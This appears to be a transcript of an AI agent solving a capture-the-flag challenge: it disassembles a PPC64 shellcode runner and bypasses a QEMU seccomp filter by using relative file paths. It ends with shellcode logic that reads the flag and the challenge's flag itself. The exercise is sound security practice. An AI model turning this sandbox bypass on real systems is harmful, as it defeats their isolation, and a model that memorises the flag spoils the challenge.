# Thread Handoff - Thread: bright-signal-3291 - UUID: ff070b6d-9e1a-4443-b9dc-b49807c7cc19 - CTF: midnight-sun-ctf-2026-quals - Challenge: speed-4 - Runtime: codex - Model: gpt-5.5 - Status: completed ## Transcript - **Assistant:** I’ll inspect the local challenge files first to identify the service behavior before touching the remote endpoint. I’ll also post concise progress notes to the webhook when there’s something concrete to report. - **Assistant:** The challenge ships a statically linked big-endian PowerPC64 binary plus its QEMU runner. I’m going to run it locally and inspect symbols/strings to pin down the protocol. - **Assistant:** The bundled QEMU binary is present but lacks the executable bit, so the local runner currently fails with `Permission denied`. I’m checking whether there’s a system QEMU available before requesting a permission change. - **Assistant:** The challenge mount itself is read-only, so I can’t chmod the bundled runner in place. I’ll copy it into `/workspace` and execute that copy, which keeps the challenge files untouched. - **Assistant:** Local execution shows the service is a shellcode runner: it asks for a shellcode size, reads bytes, mmaps, and executes. The next step is to reverse the mmap constraints and any filters so we can send PPC64 shellcode that prints the flag. - **Assistant:** INFO: Analyze len bytes of instructions for references (aar) - **Assistant:** INFO: Finding and parsing C++ vtables (avrr) INFO: Analyzing methods (af @@ method.*) INFO: Emulate functions to find computed references (aaef) INFO: Recovering local variables (afva@@@F) INFO: Type matching analysis for all functions (aaft) INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) ┌ 180: int main (void *s, char **argv, char **envp, int64_t arg4, int64_t arg_70h, int64_t arg_7ch, int64_t arg_84h, int64_t arg_488h, int64_t arg_10h); // noreturn │ `- args(r3, r4, r5, r9, sp[0x10..0x488]) │ 0x10000f54 7c0802a6 mflr r0 │ 0x10000f58 f8010010 std r0, 0x10(r1) │ 0x10000f5c fbe1fff8 std r31, -8(r1) │ 0x10000f60 f821fb61 stdu r1, -0x4a0(r1) │ 0x10000f64 7c3f0b78 mr r31, r1 │ 0x10000f68 7c691b78 mr r9, r3 ; argc │ 0x10000f6c f89f0070 std r4, 0x70(r31) ; 0x100d7e70 ; argv │ 0x10000f70 913f007c stw r9, 0x7c(r31) ; 0x100d7e7c ; arg4 │ 0x10000f74 e92d8ff0 ld r9, -0x7010(r13) │ 0x10000f78 f93f0488 std r9, 0x488(r31) ; 0x100d8288 │ 0x10000f7c 39200000 li r9, 0 │ 0x10000f80 393f0088 addi r9, r31, 0x88 │ 0x10000f84 39400400 li r10, 0x400 │ 0x10000f88 7d455378 mr r5, r10 ; size_t n │ 0x10000f8c 38800000 li r4, 0 ; int c │ 0x10000f90 7d234b78 mr r3, r9 ; void *s │ 0x10000f94 4801ef8d bl sym.memset ; void *memset(void *s, int c, size_t n) │ 0x10000f98 60000000 nop │ 0x10000f9c 60000000 nop │ 0x10000fa0 39228890 addi r9, r2, -0x7770 │ 0x10000fa4 e9290000 ld r9, 0(r9) ; str.__0 │ ; 0x100a7e00 ; "__0" │ 0x10000fa8 38c00000 li r6, 0 ; size_t size │ 0x10000fac 38a00002 li r5, 2 ; int mode │ 0x10000fb0 38800000 li r4, 0 ; char *buf │ 0x10000fb4 7d234b78 mr r3, r9 ; FILE*stream │ 0x10000fb8 48008f89 bl sym.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size) │ 0x10000fbc 60000000 nop │ 0x10000fc0 60000000 nop │ 0x10000fc4 39228888 addi r9, r2, -0x7778 │ 0x10000fc8 e9290000 ld r9, 0(r9) ; str.__0 │ ; 0x100a7e00 ; "__0" │ 0x10000fcc 38c00000 li r6, 0 ; size_t size │ 0x10000fd0 38a00002 li r5, 2 ; int mode │ 0x10000fd4 38800000 li r4, 0 ; char *buf │ 0x10000fd8 7d234b78 mr r3, r9 ; FILE*stream │ 0x10000fdc 48008f65 bl sym.setvbuf ; int setvbuf(FILE*stream, char *buf, int mode, size_t size) │ 0x10000fe0 60000000 nop │ 0x10000fe4 3c62fffc addis r3, r2, -4 ; 0x100a7e00 ; "__0" │ 0x10000fe8 3863a258 addi r3, r3, -0x5da8 ; 0x100a2058 ; " \e[38;5;223m▄\e[48;5;230m▄\e[0m\e[38;5;223m█████████\e[0m \e[38;5;223m\e[48;5;230m▄\e[0m\e[38;5;223m█████████▄\e[0m \e[38;5;223m▄\e[48;5;230m▄\e[0m\e[38;5;223m█████████\e[0m \e[38;5;223m▄\e[48;5;230m▄\e[0m\e[38;5;223m█████████\e[0m \e[38;5;223m\e[48;5;230m▄\e[0m\e[38;5;223m████████▄\e[0m \e[38;5;223m\e[48;5;230m▄\e[0m\e[38;5;223m███ \e[38;5;223m\e[48;5;230m▄\e[0m\e[38;5;223m███\e[0m\n \e[38;5;223m\e[48;5;215m████▀▀▀▀▀▀▀\e[0m \e[38;5;223m████\e[48;5;215m▀▀▀████\e[0m \e[38;5;223m████\e[48;5;215m▀▀▀▀▀▀▀\e[0m \e[38;5;223m████\e[48;5;215m▀▀▀▀▀▀▀\e[0m \e[38;5;223m████\e[48;5;215m▀▀████\e[0m\e[38;5;223m▄\e[0m \e[38;5;230m▄\e[0m\e[38;5;223m▄▄\e[0m \e[38;5;223m████ ████\e[0m\n \e[38;5;223m████\e[0m\e[38;5;223m▄▄▄▄▄▄\e[0m \e[38;5;223m████▄▄▄████\e[0m \e[38;5;223m████▄▄▄\e[0m \e[38;5;223m████▄▄▄\e[0m \e[38;5;223m████ \e[0m\e[38;5;215m▀\e[38;5;223m████\e[0m \e[38;5;223m███\e[0m \e[38;5;223m████▄▄▄████\e[0m\n \e[38;5;215m▀\e[0m\e[38;5;223m\e[48;5;215m▀▀▀▀▀▀████\e[0m \e[38;5;223m██████████\e[48;5;215m▀\e[0m \e[38;5;223m████\e[48;5;215m▀▀▀\e[0m \e[38;5;223m████\e[48;5;215m▀▀▀\e[0m \e[38;5;223m████ ████\e[0m \e[38;5;230m\e[48;5;215m▄\e[0m\e[38;5;223m\e[38;5;223m\e[48;5;215m▄▄\e[0m \e[38;5;223m\e[48;5;215m▀██████████\e[0m\n \e[38;5;223m▄▄▄▄▄▄▄████\e[0m \e[38;5;223m████\e[0m\e[38;5;215m▀▀▀▀▀▀\e[0m \e[38;5;223m████▄▄▄▄▄▄▄\e[0m \e[38;5;223m████▄▄▄▄▄▄▄\e[0m \e[38;5;223m████▄▄████\e[48;5;215m▀\e[0m \e[38;5;223m███\e[0m \e[38;5;215m▀▀▀▀▀▀\e[0m\e[38;5;223m████\e[0m\n \e[38;5;223m\e[48;5;215m██████████▀\e[0m \e[38;5;223m████\e[0m \e[38;5;223m\e[48;5;215m▀██████████\e[0m \e[38;5;223m\e[48;5;215m▀██████████\e[0m \e[38;5;223m█████████\e[48;5;215m▀\e[0m \e[38;5;215m▀▀▀\e[0m \e[38;5;223m████\e[0m\n \e[38;5;215m▀▀▀▀▀▀▀▀▀▀\e[0m \e[38;5;215m▀▀▀▀\e[0m \e[38;5;215m▀▀▀▀▀▀▀▀▀▀\e[0m \e[38;5;215m▀▀▀▀▀▀▀▀▀▀\e[0m \e[38;5;215m▀▀▀▀▀▀▀▀▀\e[0m \e[38;5;215m▀▀▀▀\e[0m\n" ; const char *s │ 0x10000fec 48008c25 bl sym.puts ; int puts(const char *s) │ 0x10000ff0 60000000 nop │ 0x10000ff4 3c62fffc addis r3, r2, -4 ; 0x100a7e00 ; "__0" │ 0x10000ff8 3863ac78 addi r3, r3, -0x5388 ; 0x100a2a78 ; "shellcode size:" ; const char *format │ 0x10000ffc 48002855 bl sym.__printf ; int printf(const char *format) │ 0x10001000 60000000 nop └ 0x10001004 4bfffd79 bl sym.read_int - **Assistant:** ERROR: Cannot determine entrypoint, using 0x10000a1c WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time 0x10001000 60000000 nop 0x10001004 4bfffd79 bl sym.read_int 0x10001008 7c691b78 mr r9, r3 0x1000100c 913f0084 stw r9, 0x84(r31) 0x10001010 e93f0086 lwa r9, 0x84(r31) 0x10001014 7d244b78 mr r4, r9 0x10001018 3c62fffc addis r3, r2, -4 0x1000101c 3863ac90 addi r3, r3, -0x5370 0x10001020 48002831 bl sym.__printf 0x10001024 60000000 nop 0x10001028 813f0084 lwz r9, 0x84(r31) 0x1000102c 2c090400 cmpwi r9, 0x400 0x10001030 4081001c ble 0x1000104c 0x10001034 3c62fffc addis r3, r2, -4 0x10001038 3863ac98 addi r3, r3, -0x5368 0x1000103c 48008bd5 bl sym.puts 0x10001040 60000000 nop 0x10001044 39200001 li r9, 1 ┌─< 0x10001048 4800007c b 0x100010c4 │ 0x1000104c 3c62fffc addis r3, r2, -4 │ 0x10001050 3863acc0 addi r3, r3, -0x5340 │ 0x10001054 480027fd bl sym.__printf │ 0x10001058 60000000 nop │ 0x1000105c e95f0086 lwa r10, 0x84(r31) │ 0x10001060 60000000 nop │ 0x10001064 39228890 addi r9, r2, -0x7770 │ 0x10001068 e9090000 ld r8, 0(r9) │ 0x1000106c 393f0088 addi r9, r31, 0x88 │ 0x10001070 7d064378 mr r6, r8 │ 0x10001074 7d455378 mr r5, r10 │ 0x10001078 38800001 li r4, 1 │ 0x1000107c 7d234b78 mr r3, r9 │ 0x10001080 48008931 bl sym._IO_fread │ 0x10001084 60000000 nop │ 0x10001088 e95f0086 lwa r10, 0x84(r31) │ 0x1000108c 393f0088 addi r9, r31, 0x88 │ 0x10001090 7d445378 mr r4, r10 │ 0x10001094 7d234b78 mr r3, r9 │ 0x10001098 4bfffd6d bl sym.execute_shellcode │ 0x1000109c 7c691b78 mr r9, r3 │ 0x100010a0 2c090000 cmpwi r9, 0 │ 0x100010a4 4182001c beq 0x100010c0 │ 0x100010a8 3c62fffc addis r3, r2, -4 │ 0x100010ac 3863acd0 addi r3, r3, -0x5330 │ 0x100010b0 48008b61 bl sym.puts │ 0x100010b4 60000000 nop │ 0x100010b8 39200001 li r9, 1 ┌──< 0x100010bc 48000008 b 0x100010c4 ││ 0x100010c0 39200000 li r9, 0 └└─> 0x100010c4 7d2907b4 extsw r9, r9 0x100010c8 e91f0488 ld r8, 0x488(r31) 0x100010cc e94d8ff0 ld r10, -0x7010(r13) 0x100010d0 7d085279 xor. r8, r8, r10 0x100010d4 39400000 li r10, 0 0x100010d8 4182000c beq 0x100010e4 0x100010dc 48025005 bl sym.__stack_chk_fail_local 0x100010e0 60000000 nop 0x100010e4 7d234b78 mr r3, r9 0x100010e8 383f04a0 addi r1, r31, 0x4a0 0x100010ec e8010010 ld r0, 0x10(r1) 0x100010f0 7c0803a6 mtlr r0 0x100010f4 ebe1fff8 ld r31, -8(r1) 0x100010f8 4e800020 blr 0x100010fc 00000000 invalid 0x10001100 00000001 invalid 0x10001104 80010001 lwz r0, 1(r1) 0x10001108 60000000 nop 0x1000110c 60000000 nop ;-- call_fini: 0x10001110 7c0802a6 mflr r0 0x10001114 fbc1fff0 std r30, -0x10(r1) 0x10001118 fbe1fff8 std r31, -8(r1) 0x1000111c f8010010 std r0, 0x10(r1) 0x10001120 f821ff71 stdu r1, -0x90(r1) 0x10001124 3fe2ffff addis r31, r2, -1 0x10001128 3fc2ffff addis r30, r2, -1 0x1000112c 3bffe9e8 addi r31, r31, -0x1618 0x10001130 3bdee9d8 addi r30, r30, -0x1628 0x10001134 7fdef850 subf r30, r30, r31 0x10001138 f8410028 std r2, 0x28(r1) 0x1000113c 7fde1e75 sradi. r30, r30, 3 0x10001140 4182008c beq 0x100011cc 0x10001144 73c90001 andi. r9, r30, 1 0x10001148 fba10078 std r29, 0x78(r1) 0x1000114c 3bbeffff addi r29, r30, -1 0x10001150 41820030 beq 0x10001180 0x10001154 e93ffff9 ldu r9, -8(r31) ; 0x100d7df8 0x10001158 e9490000 ld r10, 0(r9) 0x1000115c e9690010 ld r11, 0x10(r9) 0x10001160 7d4903a6 mtctr r10 0x10001164 e8490008 ld r2, 8(r9) 0x10001168 4e800421 bctrl 0x1000116c e8410028 ld r2, 0x28(r1) 0x10001170 7fbeeb79 or. r30, r29, r29 0x10001174 41820054 beq 0x100011c8 0x10001178 60000000 nop 0x1000117c 60420000 ori r2, r2, 0 0x10001180 e93ffff8 ld r9, -8(r31) ; 0x100d7df8 0x10001184 3bdeffff addi r30, r30, -1 0x10001188 3bfffff0 addi r31, r31, -0x10 0x1000118c e9490000 ld r10, 0(r9) 0x10001190 e9690010 ld r11, 0x10(r9) 0x10001194 7d4903a6 mtctr r10 0x10001198 e8490008 ld r2, 8(r9) 0x1000119c 4e800421 bctrl 0x100011a0 e8410028 ld r2, 0x28(r1) 0x100011a4 e93f0000 ld r9, 0(r31) ; 0x100d7e00 0x100011a8 e9490000 ld r10, 0(r9) 0x100011ac e9690010 ld r11, 0x10(r9) 0x100011b0 7d4903a6 mtctr r10 0x100011b4 e8490008 ld r2, 8(r9) 0x100011b8 4e800421 bctrl 0x100011bc e8410028 ld r2, 0x28(r1) 0x100011c0 37deffff addic. r30, r30, -1 0x100011c4 4082ffbc bne 0x10001180 0x100011c8 eba10078 ld r29, 0x78(r1) 0x100011cc 480a0e4d bl sym._fini 0x100011d0 60000000 nop 0x100011d4 38210090 addi r1, r1, 0x90 0x100011d8 e8010010 ld r0, 0x10(r1) 0x100011dc ebc1fff0 ld r30, -0x10(r1) - **Assistant:** ERROR: Cannot determine entrypoint, using 0x10000a1c WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time ERROR: Cannot find function at 0x10000e04 - **Assistant:** The sandbox setup is just `prctl(0x1337)` before jumping into the shellcode; the program ignores the return value. I’m treating the intended solve as direct PPC64 Linux shellcode and testing it locally under the supplied QEMU. - **Assistant:** dpkg-query: no path found matching pattern *bin/powerpc*linux*-as* [ERROR] Could not find 'as' installed for ContextType(arch = 'powerpc', bits = 64, endian = 'big', newline = b'\n', os = 'linux') Try installing binutils for this architecture: https://docs.pwntools.com/en/stable/install/binutils.html Traceback (most recent call last): File "", line 3, in File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/context/__init__.py", line 1716, in setter return function(*a, **kw) ^^^^^^^^^^^^^^^^^^ File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 794, in asm assembler = _assembler() ^^^^^^^^^^^^ File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 253, in _assembler gas, version = which_binutils('as', check_version=True) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/context/__init__.py", line 1716, in setter return function(*a, **kw) ^^^^^^^^^^^^^^^^^^ File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 248, in which_binutils print_binutils_instructions(util, context) File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/asm.py", line 136, in print_binutils_instructions log.error(""" File "/opt/ctf-venv/lib/python3.12/site-packages/pwnlib/log.py", line 439, in error raise PwnlibException(message % args) pwnlib.exception.PwnlibException: Could not find 'as' installed for ContextType(arch = 'powerpc', bits = 64, endian = 'big', newline = b'\n', os = 'linux') Try installing binutils for this architecture: https://docs.pwntools.com/en/stable/install/binutils.html - **Assistant:** Ubuntu clang version 21.1.8 (6ubuntu1) Target: x86_64-pc-linux-gnu Thread model: posix InstalledDir: /usr/lib/llvm-21/bin - **Assistant:** The preinstalled pwntools path lacks a PPC cross-assembler, but Clang has an integrated PPC64 assembler. The sandbox blocks temporary object output, so I’ll use `/workspace` for generated assembly/object artifacts. - **Assistant:** /bin/bash: line 1: 3 Done python3 -c "import sys; d=open('/workspace/solve.o','rb').read()[0x40:0x40+0x66]; sys.stdout.buffer.write(str(len(d)).encode()+b'\n'+d)" 4 Bad system call (core dumped) | /workspace/qemu-ppc64 /challenge/speed4 - **Assistant:** The straightforward `open/read/write` shellcode dies with `Bad system call`, so the custom `prctl(0x1337)` is active in the provided QEMU and blocks `open`. I’m now reversing the runner/sandbox path to see which syscalls are allowed or how to bypass it. - **Assistant:** WARN: Relocs has not been applied. Please use `-e bin.relocs.apply=true` or `-e bin.cache=true` next time 84572 0x00c791cb 0x000411d0 28 29 .debug_str ascii init_sandbox_open_read_write 84702 0x00c79967 0x0004196c 25 26 .debug_str ascii init_sandbox_write_stdout 36949 0x00326411 0x00326411 27 28 .rodata ascii Enabling Shellcode Sandbox\n - **Assistant:** 16a887: 0f 84 21 1b 00 00 je 16c3ae 16a88d: 48 81 fb 38 13 00 00 cmp $0x1338,%rbx 16a894: 0f 85 2d 11 00 00 jne 16b9c7 16a89a: ba 1b 00 00 00 mov $0x1b,%edx 16a89f: 48 8b 0d 6a 3c 32 00 mov 0x323c6a(%rip),%rcx # 48e510 16a8a6: be 01 00 00 00 mov $0x1,%esi 16a8ab: 48 8d 3d 5f bb 1b 00 lea 0x1bbb5f(%rip),%rdi # 326411 <__func__.5+0xa31> 16a8b2: bb 01 00 00 80 mov $0x80000001,%ebx 16a8b7: e8 b4 42 0e 00 call 24eb70 <_IO_fwrite> 16a8bc: 48 c1 e3 05 shl $0x5,%rbx 16a8c0: 45 31 c0 xor %r8d,%r8d 16a8c3: 31 c9 xor %ecx,%ecx 16a8c5: 48 89 9d d0 ee ff ff mov %rbx,-0x1130(%rbp) 16a8cc: 31 d2 xor %edx,%edx 16a8ce: be 01 00 00 00 mov $0x1,%esi 16a8d3: 48 b8 15 00 00 01 01 movabs $0x101000015,%rax 16a8da: 00 00 00 16a8dd: 48 89 85 c8 ee ff ff mov %rax,-0x1138(%rbp) 16a8e4: bf 26 00 00 00 mov $0x26,%edi 16a8e9: 48 bb 15 00 00 01 3c movabs $0x3c01000015,%rbx 16a8f0: 00 00 00 16a8f3: 48 89 85 d8 ee ff ff mov %rax,-0x1128(%rbp) 16a8fa: 48 b8 06 00 00 00 00 movabs $0x7fff000000000006,%rax 16a901: 00 ff 7f 16a904: 48 89 85 e0 ee ff ff mov %rax,-0x1120(%rbp) 16a90b: 48 89 85 f0 ee ff ff mov %rax,-0x1110(%rbp) 16a912: 48 89 85 00 ef ff ff mov %rax,-0x1100(%rbp) -- 16c39d: e9 33 7f ff ff jmp 1642d5 16c3a2: 49 c7 c0 f2 ff ff ff mov $0xfffffffffffffff2,%r8 16c3a9: e9 ba 55 ff ff jmp 161968 16c3ae: 48 8b 0d 5b 21 32 00 mov 0x32215b(%rip),%rcx # 48e510 16c3b5: ba 1b 00 00 00 mov $0x1b,%edx 16c3ba: be 01 00 00 00 mov $0x1,%esi 16c3bf: 48 8d 3d 4b a0 1b 00 lea 0x1ba04b(%rip),%rdi # 326411 <__func__.5+0xa31> 16c3c6: 48 bb 15 00 00 01 01 movabs $0x101000015,%rbx 16c3cd: 00 00 00 16c3d0: e8 9b 27 0e 00 call 24eb70 <_IO_fwrite> 16c3d5: 48 89 9d d8 ee ff ff mov %rbx,-0x1128(%rbp) 16c3dc: 31 c9 xor %ecx,%ecx 16c3de: 31 d2 xor %edx,%edx 16c3e0: 45 31 c0 xor %r8d,%r8d 16c3e3: be 01 00 00 00 mov $0x1,%esi 16c3e8: bf 26 00 00 00 mov $0x26,%edi 16c3ed: 48 bb 15 00 00 01 02 movabs $0x201000015,%rbx 16c3f4: 00 00 00 16c3f7: 48 b8 06 00 00 00 00 movabs $0x7fff000000000006,%rax 16c3fe: 00 ff 7f 16c401: 48 89 9d e8 ee ff ff mov %rbx,-0x1118(%rbp) 16c408: 48 bb 15 00 00 01 01 movabs $0x10101000015,%rbx 16c40f: 01 00 00 16c412: 48 89 85 d0 ee ff ff mov %rax,-0x1130(%rbp) 16c419: 48 89 85 e0 ee ff ff mov %rax,-0x1120(%rbp) 16c420: 48 89 85 f0 ee ff ff mov %rax,-0x1110(%rbp) 16c427: 48 89 9d f8 ee ff ff mov %rbx,-0x1108(%rbp) - **Assistant:** /bin/bash: line 1: 623 Bad system call (core dumped) strace -f -e trace=%file,%process,%desc,prctl /workspace/qemu-ppc64 /challenge/speed4 < <(python3 -c "import sys; d=open('/workspace/solve.o','rb').read()[0x40:0x40+0x66]; sys.stdout.buffer.write(str(len(d)).encode()+b'\n'+d)") - **Assistant:** The SIGSYS was not the actual `openat`; QEMU first tried `access("/usr/gnemul/qemu-ppc64/...")` for an absolute guest path, and `access` is not whitelisted. The workaround is to use a relative traversal path like `../../../../flag`, which avoids QEMU’s absolute-path prefix check. - **Assistant:** The relative-path variant successfully printed `/etc/hostname` locally before the runner died during teardown, which is good enough for the remote flag read. I’ve rebuilt the payload for `../../../../flag` and I’m sending it to the challenge service now. - **Assistant:** ▄▄█████████ ▄█████████▄ ▄▄█████████ ▄▄█████████ ▄████████▄ ▄███ ▄███ ████▀▀▀▀▀▀▀ ████▀▀▀████ ████▀▀▀▀▀▀▀ ████▀▀▀▀▀▀▀ ████▀▀████▄ ▄▄▄ ████ ████ ████▄▄▄▄▄▄ ████▄▄▄████ ████▄▄▄ ████▄▄▄ ████ ▀████ ███ ████▄▄▄████ ▀▀▀▀▀▀▀████ ██████████▀ ████▀▀▀ ████▀▀▀ ████ ████ ▄▄▄ ▀██████████ ▄▄▄▄▄▄▄████ ████▀▀▀▀▀▀ ████▄▄▄▄▄▄▄ ████▄▄▄▄▄▄▄ ████▄▄████▀ ███ ▀▀▀▀▀▀████ ██████████▀ ████ ▀██████████ ▀██████████ █████████▀ ▀▀▀ ████ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀▀ ▀▀▀▀▀▀▀▀▀ ▀▀▀▀ shellcode size: 105 shellcode: @€8 - **Assistant:** The first remote read did not produce flag text, so the file is probably not at `/flag` or the service has a different working directory layout. I’m going to reuse the same shellcode bytes with different relative filenames; the branch offsets are fixed, so only the trailing path string changes. - **Assistant:** flag => b'midnight{ad5edf1df154888fb40e3d1337f89c84}\n' FOUND midnight{ad5edf1df154888fb40e3d1337f89c84} - **Assistant:** Solved. Flag: ```text midnight{ad5edf1df154888fb40e3d1337f89c84} ``` The binary is a PPC64 big-endian shellcode runner. It reads a size up to `0x400`, mmaps RW memory, copies shellcode, mprotects it RX, calls `prctl(0x1337)`, then jumps to the shellcode. The bundled QEMU implements that `prctl(0x1337)` as a seccomp sandbox. Direct absolute paths like `/flag` fail because QEMU first calls host `access("/usr/gnemul/qemu-ppc64/...")`, and `access` is not allowed by the filter. The fix was to use a relative path instead. I used PPC64 shellcode that does: ```text open("flag", O_RDONLY) read(fd, stack_buf, 256) write(1, stack_buf, n) exit(0) ``` The final remote payload with path `flag` returned the flag immediately. The working assembly is in [solve.S](/workspace/solve.S). - **System:** Thread completed